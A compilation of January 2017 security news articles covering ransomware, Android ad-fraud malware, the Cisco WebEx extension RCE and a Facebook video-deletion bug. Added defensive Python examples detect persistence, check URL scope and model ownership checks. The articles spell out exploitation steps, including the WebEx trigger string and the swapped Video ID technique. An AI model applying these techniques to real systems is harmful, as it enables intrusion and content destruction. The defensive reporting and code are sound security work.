“The infected Windows host has an image of the decryption instructions as the desktop background. There’s also an HTML file with the same instructions dropped to the desktop. The same HTML file is also dropped to any directory with encrypted files. ‘.sage’ is the suffix for all encrypted files,” the security researcher explains.

The Sage ransomware maintains persistence on the infected machine via a scheduled task; its executable is stored in the user’s AppData\Roaming directory.
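A defender-side complement, added here and not taken from the original report: a Python hunt over Task Scheduler XML (the files under C:\Windows\System32\Tasks) that flags tasks whose command or arguments resolve to user-writable profile directories such as AppData\Roaming, the persistence pattern described above. The task documents in the block are constructed samples, not real Sage artifacts.

```python
"""Hunt scheduled tasks that launch from user-writable profile directories.

Added example, not code from the Sage analysis. The task XML below is
constructed; the element names and namespace are those of the Windows
Task Scheduler schema.
"""
import os
import re
import xml.etree.ElementTree as ET

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Paths a standard user can write to; a task launching from here deserves a
# look (the article reports Sage's binary living under AppData\Roaming).
SUSPECT_DIRS = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\")

# Environment variables that expand into those directories. The user name is
# irrelevant for the check, so a placeholder "_" is substituted.
ENV_ALIASES = {
    "appdata": "c:\\users\\_\\appdata\\roaming",
    "localappdata": "c:\\users\\_\\appdata\\local",
    "temp": "c:\\users\\_\\appdata\\local\\temp",
    "tmp": "c:\\users\\_\\appdata\\local\\temp",
}


def normalize_command(value):
    """Lower-case a Command/Arguments string, drop surrounding quotes and
    expand the profile-related %VARS% so path checks work regardless of how
    the task author wrote the path."""
    value = value.strip().strip('"').lower()
    return re.sub(r"%([a-z]+)%",
                  lambda m: ENV_ALIASES.get(m.group(1), m.group(0)), value)


def task_findings(xml_doc, task_name="<unnamed>"):
    """Return (task, field, raw value) for every Exec action whose Command or
    Arguments points into a suspect directory. xml_doc may be str or bytes."""
    root = ET.fromstring(xml_doc)
    findings = []
    for exe in root.iter(f"{TASK_NS}Exec"):
        fields = (("Command", exe.findtext(f"{TASK_NS}Command") or ""),
                  ("Arguments", exe.findtext(f"{TASK_NS}Arguments") or ""))
        for field, raw in fields:
            if any(d in normalize_command(raw) for d in SUSPECT_DIRS):
                findings.append((task_name, field, raw.strip()))
    return findings


def scan_task_folder(folder):
    """Walk a folder of task XML files (normally C:\\Windows\\System32\\Tasks)
    and collect findings; unreadable or non-XML files are skipped."""
    results = []
    for dirpath, _, files in os.walk(folder):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:  # bytes honour the XML encoding declaration
                    results.extend(task_findings(fh.read(), os.path.relpath(path, folder)))
            except (ET.ParseError, OSError):
                continue
    return results


# Constructed samples standing in for real task definitions.
SUSPECT_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>%APPDATA%\ExampleDrop\payload.exe</Command></Exec>
  </Actions>
</Task>"""

INDIRECT_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\cmd.exe</Command>
      <Arguments>/c "%TEMP%\stage.bat"</Arguments>
    </Exec>
  </Actions>
</Task>"""

BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files\Vendor\updater.exe</Command>
      <Arguments>/silent</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for name, doc in (("Example", SUSPECT_TASK), ("Stage", INDIRECT_TASK), ("Updater", BENIGN_TASK)):
        print(name, task_findings(doc, name))
```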

The Sage 2.0 ransomware generates post-infection traffic in the form of HTTP POST requests, like the CryLocker ransomware. Sage traffic differs from CryLocker’s in that it is encrypted or encoded in some way.

“When the callback domains for Sage didn’t resolve in DNS, the infected host sent UDP packets sent to over 7,000 IP addresses. I think this could be UDP-based peer-to-peer (P2P) traffic, and it appears to be somehow encoded or encrypted,” added the security researcher.

“I’m not sure how widely-distributed Sage ransomware is. I’ve only seen it from this one malspam campaign, and I’ve only seen it one day so far. I’m also not sure how effective this particular campaign is. It seems these emails can easily be blocked, so few end users may have actually seen Sage 2.0. Still, Sage is another name in the wide variety of existing ransomware families. This illustrates how profitable ransomware remains for cyber criminals,” Duncan concludes.

TorWorld helps you to manage a Tor node, promising an upcoming Tor-as-a-Service
25.1.2017 securityaffairs Safety

The TorWorld initiative aims to build a community area for those people that desire to set up either a Tor Relay or a Tor Exit node.
We all recognize the importance of the Tor network, an important instrument to protect users’ anonymity and avoid censorship. Today I want to present an interesting initiative launched by Tor enthusiasts: TorWorld, part of the CryptoWorld Foundation.

The CryptoWorld Foundation groups several organizations that provide anonymity services. The TorWorld aims to build a community area for those people that desire to set up either a Tor Relay or a Tor Exit node.

According to Bleepingcomputer.com, the project was born out of a real necessity:

“The idea for ‘TorWorld’ came about four months ago,” Beard, one of TorWorld’s founding members told Bleeping Computer.

“We originally ran a few Guard Relays for a little over a year privately,” Beard continued. “After we had an issue with our Guard nodes being removed by our ISP at the time because of a misunderstanding, we thought about possibly setting up a service dedicated to running Tor nodes, and educating people on Tor.”

“Eventually we started that [idea], and at first we looked for automation scripts to make it easier for us to deploy multiple Tor servers in a fast and dynamic way,” Beard said. “To our surprise, we couldn’t find a single script.”

The TorWorld team published scripts that simplify the setup of a Tor node, including Bash scripts for quickly deploying Tor guard (entry) nodes, Tor relay (middle) servers, Tor bridges (unlisted relays), and Tor exit nodes.

The project is ambitious and we can only wish the team great success. TorWorld representatives confirmed that the team intends to become a hosting provider for Tor servers and is thinking about a sort of Tor-as-a-Service (TaaS).

Beard explained that the final goal is to allow users to create Tor nodes on top of TorWorld’s server infrastructure in a single click, thanks to a set of open-sourced Bash scripts.

This is an important step: unfortunately, setting up a Tor node today is not a simple operation for everyone, even though it is very well documented on the official Tor Project website.

“We’ll be adding more dynamic customization options for the FastRelay, and FastExit scripts,” Beard added.

TorWorld will also offer a platform to manage abuse notices for Tor servers operated by its users. It will be a paid service because a TorWorld team will handle their abuse notifications.

We all know that darknets represent a facilitator and aggregator for cyber criminal communities, and the Tor network is one of the most popular anonymizing networks in the criminal underground.

The TorWorld will not allow criminal uses of its infrastructure.

Currently, there is no certainty about when and how the TorWorld TaaS service will be ready; in any case, I’ll monitor its progress with great interest and admiration.

HummingWhale – HummingBad Android Malware returns even more dangerous than before
25.1.2017 securityaffairs Android

Last year, the HummingBad Android malware infected as many as 85 million devices, now it has returned under the new name of HummingWhale.
CERT-EU and other sources corroborated Check Point researchers’ findings confirming that a new variant of HummingBad, the ad-fraud malware that made its operators a great deal of money, is spreading rapidly on the Android marketplace Google Play. HummingBad was first seen almost a year ago, in January/February 2016, and is attributed to the malware authors Yingmob; it raked in approximately $300,000 USD per month for the better part of 2016, and approximately 10 million Android devices were infected in the first part of last year.

Now, dubbed “HummingWhale” by Check Point, it is at large with better ad-fraud capabilities and more sophisticated techniques than HummingBad; it affects several applications that together have been downloaded several million times.

“Check Point researchers have found a new variant of the HummingBad malware hidden in more than 20 apps on Google Play. The infected apps in this campaign were downloaded several million times by unsuspecting users” reads the report published by Check Point.


Check Point first noticed this when it found Trojan-riddled apps published under fake developer names of Chinese origin and observed the apps’ behavior at startup. Beyond the startup behavior, closing the application normally does not exit it cleanly: instead, it covertly “minimizes” and keeps running in the virtual environment.

Moreover, the apps carried a 1.3MB payload disguised as an image called group.png; it is anything but an image, as the payload is an executable APK file.

“This .apk operates as a dropper, used to download and execute additional apps, similar to the tactics employed by previous versions of HummingBad. However, this dropper went much further. It uses an Android plugin called DroidPlugin, originally developed by Qihoo 360, to upload fraudulent apps on a virtual machine.”, said Oren Koriat, Mobile Cyber Security Analyst at Check Point.

What makes HummingWhale different from the original is that it runs the downloaded applications without having to obtain root or elevated privileges, making the phone susceptible to further fraudulent applications or to the deployment of remote access tools (RATs).

Further information is available in the report, including Indicators of Compromise (IoCs).

Apple Patches Dozens of Vulnerabilities Across Product Lines

24.1.2017 Securityweek Apple
Apple this week released a new set of important security updates for its products, to patch dozens of vulnerabilities in macOS, iOS, watchOS, tvOS, and Safari, as well as in the iCloud and iTunes for Windows applications.

The newly released macOS Sierra 10.12.3 resolves 11 vulnerabilities in components such as apache_mod_php, Bluetooth, Graphics Drivers, Help Viewer, IOAudioFamily, Kernel, libarchive, and Vim. Most of the plugged issues could allow applications to execute arbitrary code, while others could allow malicious archives or web content to execute code. One of the bugs could allow an application to determine kernel memory layout.

Released on Monday, iOS 10.2.1 resolves 18 vulnerabilities in multiple components, including Auto Unlock, Contacts, Kernel, libarchive, WebKit, and Wi-Fi. WebKit was the most affected component, with no less than 12 flaws resolved in it, most of which were discovered by Google Project Zero researchers.

Affecting iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation and later, the patched security holes included one where Auto Unlock may unlock when Apple Watch is off the user's wrist, unexpected application termination when processing a maliciously crafted contact card, arbitrary code execution with kernel privileges, data exfiltration, popups being opened by malicious websites, and the possibility to manipulate an activation-locked device to briefly present the home screen.

A total of 33 vulnerabilities were addressed with the release of watchOS 3.1.3, affecting all Apple Watch models. The issues were found in components such as Accounts, Audio, Auto Unlock, CoreFoundation, CoreGraphics, CoreMedia Playback, CoreText, Disk Images, FontParser, ICU, ImageIO, IOHIDFamily, IOKit, Kernel, libarchive, Profiles, Security, syslog, and WebKit.

The resolved vulnerabilities could be exploited for arbitrary code execution, to gain root privileges, to automatically trust certificates, to cause a denial of service, to overwrite existing files, to cause an unexpected system termination, to read kernel memory, to leak memory remotely. There’s also the issue where Auto Unlock could unlock when Apple Watch is off the user's wrist.

The release of tvOS 10.1.1, for Apple TV (4th generation), was meant to resolve 12 vulnerabilities in Kernel, libarchive, and WebKit. These could result in an application executing arbitrary code with kernel privileges, arbitrary code execution when unpacking a malicious archive, and data exfiltration and arbitrary code execution when processing maliciously crafted web content.

No less than 12 bugs were patched in Safari 10.0.3, which is now available for download for OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.3. While one of these was an address bar spoofing, 11 were found in WebKit and could result in data exfiltration and arbitrary code execution.

Some of the WebKit issues were found to affect iCloud and iTunes for Windows too, and were addressed with the release of iCloud for Windows 6.1.1 and iTunes 12.5.5. The same four bugs affected both applications, resulting in arbitrary code execution.

Shamoon Attacks Possibly Aided by Greenbug Group

24.1.2017 Securityweek Virus
The stolen credentials used in the recent Shamoon attacks aimed at organizations in the Persian Gulf may have been supplied by a threat group tracked by Symantec as “Greenbug.”

Shamoon, aka Disttrack, is a disk-wiping malware that became widely known in 2012, when it damaged 35,000 computers belonging to petroleum and natural gas company Saudi Aramco. Shamoon 2, a more recent version of the threat, was recently used to target organizations in Saudi Arabia, including the country’s General Authority of Civil Aviation (GACA).

The first wave of Shamoon 2 attacks was launched on November 17 and a second wave on November 29. The attacks, which some have attributed to Iran, relied on the Disttrack malware to automatically start wiping infected systems at a specified time.

The malware was planted on targeted systems using stolen credentials, and security firm Symantec believes the information may have been obtained in a prior attack launched by a threat actor named Greenbug.

This cyber espionage group has used a remote access Trojan (RAT) called Ismdoor and various other tools in attacks aimed at organizations in the Middle East. The attackers targeted aviation, investment, government and education organizations in several countries, including Saudi Arabia, Iran, Iraq, Bahrain, Qatar, Kuwait and Turkey, and a Saudi company in Australia.

Greenbug has sent out fake business proposal emails to trick users into downloading malware onto their systems. The attackers delivered a RAR archive that stored a clean PDF and a compiled HTML help file (.chm) that contained the Ismdoor Trojan.

In order to avoid detection, the malware has been hidden in alternate data streams (ADS). Once executed, Ismdoor opens a backdoor and uses PowerShell for command and control (C&C) purposes. The Trojan is designed to install other pieces of malware, including ones capable of logging keystrokes and collecting browser, email and other sensitive data.

Symantec determined that Greenbug may have supplied credentials for the Shamoon attacks after detecting an Ismdoor infection on an administrator computer housed by one of the organizations targeted with Disttrack.

Researchers have not found any solid evidence linking the threat actors, but they pointed out that Ismdoor and other Greenbug tools became inactive just one day before the November 17 attacks.

Palo Alto Networks reported earlier this month that a variant of the Shamoon 2 malware is also designed to target virtualization products, likely in an effort to make recovery more difficult for attacked organizations.

Saudi Arabia has warned organizations to be on alert following a series of new attacks, Reuters reported on Monday. The country’s labor ministry, a chemicals firm and other companies have been allegedly hit.

Microsoft Unveils Windows Defender Security Center

24.1.2017 Securityweek Security
The upcoming Windows 10 Creators Update is designed to make the available security protections easily accessible through a new experience called Windows Defender Security Center, Microsoft says.

Last month, the tech giant shared some information on the security enhancements that the upcoming platform upgrade will bring. Microsoft is now providing more details on Windows Defender Security Center, a core feature of the operating system.

Since announcing Windows 10, Microsoft claimed that it was the most secure Windows version ever, but already proved that there was room for improvement with the release of Windows 10 Anniversary Update. One of the most important enhancements included mitigation techniques to stop the exploitation of new or undisclosed vulnerabilities.

The Windows Defender Security Center in Windows 10 Creators Update should make it easier for users to view and control the security protections the platform has to offer. The main functionality, Microsoft says, is to help users better understand and use the security features protecting them and their Windows 10 devices, even if they lack advanced knowledge on the matter.

As Rob Lefferts, Partner Director, Windows & Devices Group, Security & Enterprise, notes in a blog post, Windows Defender Security Center includes five “pillars” that users can take advantage of for controlling and keeping track of their device’s security, health and online safety experiences.

The first of these pillars is Virus & threat protection, where users can view information on their anti-virus protection, regardless of whether it is Windows Defender Antivirus or another application. For those who use Windows Defender Antivirus, scan results and threat history are available there. Those using a different anti-virus application will be able to launch it from there.

The second pillar is Device performance & health, where users can access a single view of Windows updates, drivers, battery life, and storage capacity. It also provides a Refresh Windows feature for those who want to get started with a clean install of Windows. The option maintains personal files and some Windows settings intact, but removes most apps for a fresh start that can offer performance improvements.

By going to Firewall & network protection, users can view information on the network connections and active Windows Firewall settings and can access links to network troubleshooting information. For those interested in adjusting SmartScreen settings for apps and browsers, App & browser control is the option to go to. It should prove useful to those looking to stay more informed and to remain safe online, as it warns them of potential malicious sites, downloads and unrecognized apps and files on the web.

Finally, there will be Family options, to link users to information about parental controls and to provide them with options for setting up good screen time habits and activity reports of kids’ online activity. It will also be useful for the management of controls for purchasing apps and games, as well as to view the health and safety of other family devices.

“Our goal with the new Windows Defender Security Center is to help you become more informed and make safety simple. It is equally important to us that you are protected by default and continuously protected – never giving the bad guys an opportunity to harm you. This new experience naturally supports customer choice in selecting an AV product,” Lefferts notes.

Since the new experience is also meant to ensure that users are always protected, it will keep track of antivirus subscriptions and expiration dates and will automatically launch Windows Defender Antivirus when a subscription expires. According to Lefferts, the new option should provide users with increased control over their PC, allowing them to choose the protection software and services that they like best.

“We believe the new Windows Defender Security Center lives up to these principles and we are committed to working with you, as well as security experts and organizations throughout the technology industry to create safer experiences for everyone with Windows 10,” Lefferts concluded.

Nasty Android Malware that Infected Millions Returns to Google Play Store
24.1.2017 thehackernews Android
HummingBad – an Android-based malware that infected over 10 million Android devices around the world last year and made its gang an estimated US$300,000 per month at its peak – has made a comeback.
Security researchers have discovered a new variant of the HummingBad malware hiding in more than 20 Android apps on Google Play Store.
The infected apps were already downloaded by over 12 Million unsuspecting users before the Google Security team removed them from the Play Store.
Dubbed HummingWhale by researchers at security firm Check Point, the new malware utilizes new, cutting-edge techniques that allow the nasty software to conduct Ad fraud better than ever before and generate revenue for its developers.
The Check Point researchers said the HummingWhale-infected apps had been published under the name of fake Chinese developers on the Play Store with common name structure, com.[name].camera, but with suspicious startup behaviors.
"It registered several events on boot, such as TIME_TICK, SCREEN_OFF and INSTALL_REFERRER which [were] dubious in that context," Check Point researchers said in a blog post published Monday.
HummingWhale Runs Malicious Apps in a Virtual Machine

The HummingWhale malware is trickier than HummingBad, as it uses a disguised Android application package (APK) file that acts as a dropper which downloads and runs further apps on the victim's smartphone.
If the victim notices and closes its process, the APK file then drops itself into a virtual machine in an effort to make it harder to detect.
The dropper makes use of an Android plugin created by the popular Chinese security vendor Qihoo 360 to upload malicious apps to the virtual machine, allowing HummingWhale to further install other apps without having to elevate permissions, and disguises its malicious activity to get onto Google Play.
"This .apk operates as a dropper, used to download and execute additional apps, similar to the tactics employed by previous versions of HummingBad," researchers said. "However, this dropper went much further. It uses an Android plugin called DroidPlugin, originally developed by Qihoo 360, to upload fraudulent apps on a virtual machine."
HummingWhale Runs Without having to Root the Android Device
Thanks to the virtual machine (VM), the HummingWhale malware no longer needs to root Android devices unlike HummingBad and can install any number of malicious or fraudulent apps on the victim's devices without overloading their smartphones.
Once the victim is infected, the command and control (C&C) server sends fake ads and malicious apps to the user, which run in a VM, generating a fake referrer ID used to spoof unique users for ad fraud purposes and generate revenue.
Like the original HummingBad, the purpose of HummingWhale is to make lots of money through ad fraud and fake app installations.
Besides all these malicious capabilities, the HummingWhale malware also tries to raise its reputation on Google Play Store using fraudulent ratings and comments, a tactic similar to the one utilized by the Gooligan malware.

A flaw in the Cisco WebEx Extension allows Remote Code Execution
24.1.2017 securityaffairs

Tavis Ormandy, a security expert at Google Project Zero, has discovered a critical remote code execution vulnerability in the Cisco WebEx browser extension.
Google Project Zero researcher Tavis Ormandy has discovered a critical remote code execution vulnerability in the Cisco WebEx browser extension. Cisco’s initial fix does not appear to be complete, which has led Google and Mozilla to temporarily remove the add-on from their stores.

Tavis Ormandy @taviso
There was a secret URL in WebEx that allowed any website to run arbitrary code. ¯\_(ツ)_/¯ https://bugs.chromium.org/p/project-zero/issues/detail?id=1096 …
10:23 PM - 23 Jan 2017
The flaw has a significant impact considering that the WebEx extension for Google Chrome has roughly 20 million active users.

The expert discovered that an attacker can trigger the vulnerability by using any URL that contains a “magic” pattern. The flaw could be exploited to remotely execute arbitrary code on the targeted WebEx user’s system by tricking victims into visiting a specially crafted website.

Cisco tried to fix the issue by limiting the magic URL to the https://*.webex.com and https://*.webex.com.cn domains, but the Google researcher highlighted that it could still be exploited through a potential cross-site scripting (XSS) flaw on webex.com.

“The extension works on any URL that contains the magic pattern “cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html”, which can be extracted from the extensions manifest. Note that the pattern can occur in an iframe, so there is not necessarily any user-visible indication of what is happening, visiting any website would be enough.” states the advisory published by Ormandy.

“The extension uses nativeMessaging, so this magic string is enough for any website to execute arbitrary code (!!).”

The expert discovered that even without the XSS an attacker can remotely execute arbitrary code on the target system if the victims click “OK” when they are prompted to allow a WebEx meeting to launch on the rogue website.
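To see why the scope of the activation pattern matters, here is an added example (not Cisco’s or Ormandy’s code): a Python implementation of Chrome-style match-pattern matching, applied to two constructed patterns that stand in for the original “any URL containing the magic file name” behavior and the webex.com-only restriction. The patterns and sample URLs are assumptions built from the article, not copied from the WebEx manifest.

```python
"""Match-pattern scope check, prompted by the WebEx extension issue.

Added example. ANY_ORIGIN and WEBEX_ONLY are constructed to mirror the
article's description, not the actual WebEx manifest entries.
"""
import re
from urllib.parse import urlsplit

MAGIC = "cwcsf-nativemsg-iframe-43c85c0d-d633-af5e-c056-32dc7efc570b.html"

# Constructed stand-ins for the activation rule before and after Cisco's
# restriction to webex.com.
ANY_ORIGIN = f"*://*/*{MAGIC}*"
WEBEX_ONLY = f"https://*.webex.com/*{MAGIC}*"


def compile_match_pattern(pattern):
    """Turn a Chrome-style match pattern '<scheme>://<host>/<path>' into a
    predicate over URLs.

    Supported subset: scheme '*' (http or https) or a literal scheme; host
    '*', '*.example.com' (domain plus subdomains) or a literal host; '*'
    wildcards in the path, which is matched together with the query string,
    as Chrome does.
    """
    m = re.fullmatch(r"(\*|https?)://(\*|\*\.[^/*]+|[^/*]+)(/.*)", pattern)
    if m is None:
        raise ValueError(f"unsupported match pattern: {pattern!r}")
    scheme, host, path = m.groups()
    schemes = {"http", "https"} if scheme == "*" else {scheme}
    if host == "*":
        host_re = re.compile(r".*")
    elif host.startswith("*."):
        host_re = re.compile(r"(?:.*\.)?" + re.escape(host[2:]))
    else:
        host_re = re.compile(re.escape(host))
    path_re = re.compile(".*".join(re.escape(part) for part in path.split("*")))

    def matches(url):
        parts = urlsplit(url)
        path_and_query = (parts.path or "/") + ("?" + parts.query if parts.query else "")
        return (parts.scheme in schemes
                and host_re.fullmatch(parts.hostname or "") is not None
                and path_re.fullmatch(path_and_query) is not None)

    return matches


def activating_urls(pattern, urls):
    """Return the URLs on which an extension declaring `pattern` would run."""
    match = compile_match_pattern(pattern)
    return [u for u in urls if match(u)]


# Constructed page loads. The first two are third-party pages that could just
# as well be hidden iframes, as the advisory points out.
SAMPLE_URLS = [
    f"https://third-party.example/ad/{MAGIC}",
    f"http://third-party.example/{MAGIC}?v=1",
    f"https://www.webex.com/meet/{MAGIC}",
    "https://www.webex.com/",
    "https://example.org/benign",
]

if __name__ == "__main__":
    # ANY_ORIGIN fires on the third-party pages; WEBEX_ONLY fires only on
    # webex.com, which is exactly why an XSS on that domain remains a concern.
    for name, pattern in (("any origin", ANY_ORIGIN), ("webex.com only", WEBEX_ONLY)):
        print(f"{name}: {activating_urls(pattern, SAMPLE_URLS)}")
```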

Ormandy published a PoC exploit and a demo for testing. A successful execution of the demo needs a working WebEx installation on the victim’s machine. Below is the link to the PoC exploit:

Mozilla representatives also remarked that webex.com does not use HTTP Strict Transport Security (HSTS) and Content Security Policy (CSP).

“If I’m an adversary and I can find a single XSS on that domain, all I need to do at any point in the future is intercept an outgoing HTTP request from Chrome, insert a 302 redirect, and I have an instant RCE on who knows how many machines?” said April King, information security engineer at Mozilla.

Both Google and Mozilla have decided to remove the WebEx extension from their stores until Cisco releases a complete fix for the issue.

A new loophole allowed an expert to delete any video on Facebook
24.1.2017 securityaffairs

Facebook has fixed a serious security bug that could have been exploited by hackers to delete any video shared by anyone on their wall.
A new bug in the Facebook platform was discovered by security researcher Dan Melamed; the flaw could be exploited to delete any video shared by anyone on their wall.

Dan Melamed explained that a similar issue was discovered in June 2016 by the Indian security researcher Pranav Hivarekar, who demonstrated that he was able to delete any video by exploiting a security issue in the then recently introduced video comment feature.

The new bug discovered by Melamed allowed him to delete any video on Facebook shared by anyone, without any permission or authentication. The expert also discovered that it was possible to disable commenting on any video of his choice.

“Back in June of last year I discovered a critical vulnerability that allows me to remotely delete any video on Facebook. In addition, I also had the ability to disable commenting on any video. This allows a bad actor the ability to delete videos on Facebook without permission or authentication.” states the blog post published by Melamed.

The expert detailed the steps to exploit the vulnerability. He first created a public event on the Facebook page and uploaded a video to the Discussion part of the event.
While uploading the video, the expert analyzed the POST request with the Fiddler debugging proxy and noticed a Video ID parameter that could be manipulated. Melamed found that it was possible to replace the Video ID of the video he had uploaded with the Video ID of any other video; the platform responded with a server error (“This content is no longer available”).
Despite the error message, the video was successfully posted and displayed on the user’s wall.

Once the video was posted, Melamed deleted the event post and then the attached video; this removed the video from Facebook and from the victim’s wall.
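To make the authorization gap concrete, here is an added example (not Facebook’s code; the service, class and method names are hypothetical) that replays the reported steps against a constructed in-memory model, once without and once with an ownership check on the attached Video ID:

```python
"""Ownership checks around video attachments, modelled on the reported bug.

Added example with a constructed in-memory model; not Facebook code, and all
names are hypothetical.
"""
from dataclasses import dataclass, field


class Forbidden(Exception):
    """Raised when an actor references an object they may not use."""


@dataclass
class Video:
    video_id: int
    owner: str
    deleted: bool = False


@dataclass
class Post:
    post_id: int
    author: str
    video_ids: list = field(default_factory=list)


class VideoService:
    def __init__(self, enforce_ownership):
        # enforce_ownership=False reproduces the vulnerable behaviour.
        self.enforce_ownership = enforce_ownership
        self.videos = {}
        self.posts = {}
        self._next_id = 1

    def _new_id(self):
        self._next_id += 1
        return self._next_id - 1

    def upload(self, owner):
        video = Video(self._new_id(), owner)
        self.videos[video.video_id] = video
        return video.video_id

    def create_post(self, author, video_id):
        """Attach an existing video to a new post. The reported bug: the
        server trusted the client-supplied Video ID without checking that
        the poster owned (or was allowed to use) that video."""
        video = self.videos.get(video_id)
        if video is None or video.deleted:
            raise KeyError("This content is no longer available")
        if self.enforce_ownership and video.owner != author:
            raise Forbidden("video belongs to another user")
        post = Post(self._new_id(), author, [video_id])
        self.posts[post.post_id] = post
        return post.post_id

    def delete_post(self, actor, post_id):
        """Deleting a post cascades to its attachments. With ownership checks
        the cascade only reaches videos the actor actually owns, a second
        line of defence should an unowned attachment ever slip through."""
        post = self.posts[post_id]
        if post.author != actor:
            raise Forbidden("not the post author")
        for video_id in post.video_ids:
            video = self.videos[video_id]
            if not self.enforce_ownership or video.owner == actor:
                video.deleted = True
        del self.posts[post_id]


def replay(enforce_ownership):
    """Replay the reported steps: the victim uploads a video, the researcher
    attaches it to their own event post via a swapped Video ID, then deletes
    that post. Returns whether the victim's video ended up deleted."""
    service = VideoService(enforce_ownership)
    victim_video = service.upload("victim")
    try:
        post = service.create_post("researcher", victim_video)  # swapped Video ID
        service.delete_post("researcher", post)
    except Forbidden:
        pass  # the hardened service rejects the attachment outright
    return service.videos[victim_video].deleted


if __name__ == "__main__":
    print("vulnerable model, victim video deleted:", replay(enforce_ownership=False))
    print("hardened model, victim video deleted:", replay(enforce_ownership=True))
```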

“You will also notice in the drop down section that there is the option to “Turn off commenting.” This allows you to disable commenting on the video of your choice,” Melamed writes.

This simple sequence of actions allowed the researcher to delete any video on Facebook; below is a video PoC of the hack:

Melamed reported the vulnerability to Facebook, which fixed it within a couple of weeks in early 2017. Facebook rewarded the bug hunter with $10,000 under its bug bounty program.

China makes VPNs illegal to tighten its Great Firewall
24.1.2017 thehackernews Security
China has long been known for its strict Internet censorship, enforced through the Great Firewall of China (the government's Golden Shield project), which employs a variety of techniques to censor the Internet and block access to various foreign websites in the country.
The Great Firewall has blocked some 171 out of the world's 1,000 top websites, including Google, Facebook, Twitter, Tumblr, Dropbox, and The Pirate Bay. Therefore, to thwart these restrictions and access these sites, hundreds of millions of Chinese citizens use virtual private networks (VPNs).
But now, the Chinese government has announced the mass shutdown of VPNs in the country, making it harder for internet users to bypass its Great Firewall, according to a report published by the South China Morning Post.
'Clean-Up' of China's Internet Connections
Calling it a "clean-up" of China's Internet connections, the Ministry of Industry and Information Technology said on Sunday that it had launched a 14-month-long crackdown on the use of unsupervised internet connections, including VPNs.
VPN services encrypt your Internet traffic and route that traffic through a distant connection so that web surfers in China can hide their location data and access websites that are usually restricted or censored by the country's so-called Great Firewall.
The new rules make it illegal to use or operate a local VPN service without government approval, and require all VPNs and leased cable lines operating in China to have a license from the government.
According to the ministry, "all special cable and VPN services on the mainland needed to obtain prior government approval—a move making most VPN service providers in the country of 730 million Internet users illegal."
Moreover, every internet service provider (ISP), cloud services provider and VPN reseller is also required to carry out "self-inspections" for any illegal activity taking place on its servers.
VPN Ban will Remain until March 31, 2018
In a statement, the ministry said that the country's VPN and cloud computing market "has signs of disordered development that require urgent regulation and governance" and that the crackdown is designed to "strengthen cyberspace information security management."
The ban on VPNs and cable connections would begin immediately and will remain in place until March 31, 2018.
Besides the VPNs ban, China's IT ministry also said the government would be investigating ISPs, content delivery networks and internet data centers for failing to receive the right business permits and operating in areas that exceed their intended scope.
The move is the latest in a long series of attempts by the Chinese government to stop its citizens from using VPNs and other filter-busting systems, which weaken its tight grip on its people.

Cisco WebEx Extension Flaw Allows Code Execution

24.1.2017 Securityweek Vulnerability
Google Project Zero researcher Tavis Ormandy has discovered a critical remote code execution vulnerability in the Cisco WebEx browser extension. Cisco’s initial fix does not appear to be complete, which has led to Google and Mozilla temporarily removing the add-on from their stores.

While analyzing the WebEx extension for Chrome, which has roughly 20 million active users, Ormandy noticed that it works on any URL that contains a “magic” pattern. This allows an attacker to execute arbitrary code on the targeted WebEx user’s system by getting them to access a specially crafted website.

Cisco has attempted to patch the security hole by limiting the magic URL to https://*.webex.com and https://*.webex.com.cn domains. Ormandy said the fix was acceptable, but pointed out that the vulnerability could still be exploited silently through a potential cross-site scripting (XSS) flaw on webex.com.
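As an added example (not Cisco's or Ormandy's code), the two checks below contrast the reported "magic pattern anywhere in the URL" behaviour with a decision made on the parsed origin, restricted to the https://*.webex.com and https://*.webex.com.cn hosts of Cisco's fix. The pattern string, the helper names and the sample URLs are constructed placeholders.

```python
from urllib.parse import urlparse

# Constructed placeholder standing in for the extension's trigger string;
# the real pattern is not reproduced here.
MAGIC = "/native-bridge-MAGIC-PLACEHOLDER.html"

# Host suffixes Cisco's first fix limited the pattern to, as reported above.
ALLOWED_SUFFIXES = (".webex.com", ".webex.com.cn")


def fires_substring(url: str) -> bool:
    """Reported original behaviour: the pattern anywhere in the URL fires."""
    return MAGIC in url


def fires_origin_checked(url: str) -> bool:
    """Hardened check: decide on the parsed scheme, hostname and path, never
    on the raw string, so query strings, userinfo and look-alike hosts
    cannot smuggle the pattern in."""
    parts = urlparse(url)
    if parts.scheme != "https":
        return False
    host = (parts.hostname or "").lower()
    if not host.endswith(ALLOWED_SUFFIXES):
        return False
    return parts.path == MAGIC  # exact path match, not "contains"


# Constructed sample URLs; evil.example stands in for an attacker's page.
SAMPLES = {
    "legit":     "https://www.webex.com" + MAGIC,
    "http_only": "http://www.webex.com" + MAGIC,
    "in_query":  "https://evil.example/?next=https://www.webex.com" + MAGIC,
    "userinfo":  "https://www.webex.com@evil.example" + MAGIC,
    "lookalike": "https://www.webex.com.evil.example" + MAGIC,
}


def compare(url: str):
    """(substring verdict, origin-checked verdict) for one URL."""
    return fires_substring(url), fires_origin_checked(url)


if __name__ == "__main__":
    for name, url in SAMPLES.items():
        substring, parsed = compare(url)
        print(f"{name:10} substring={substring!s:5} parsed={parsed}")
```

Even the parsed check is only as strong as the allow-listed hosts themselves, which is why the XSS and missing HSTS/CSP concerns discussed below still matter.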

Furthermore, even without the XSS, an attacker can still execute arbitrary code as long as the victim clicks “OK” when they are prompted to allow a WebEx meeting to launch on the malicious website.

Mozilla representatives said they were unhappy with Cisco’s fix and pointed out that webex.com does not use HTTP Strict Transport Security (HSTS) and Content Security Policy (CSP).

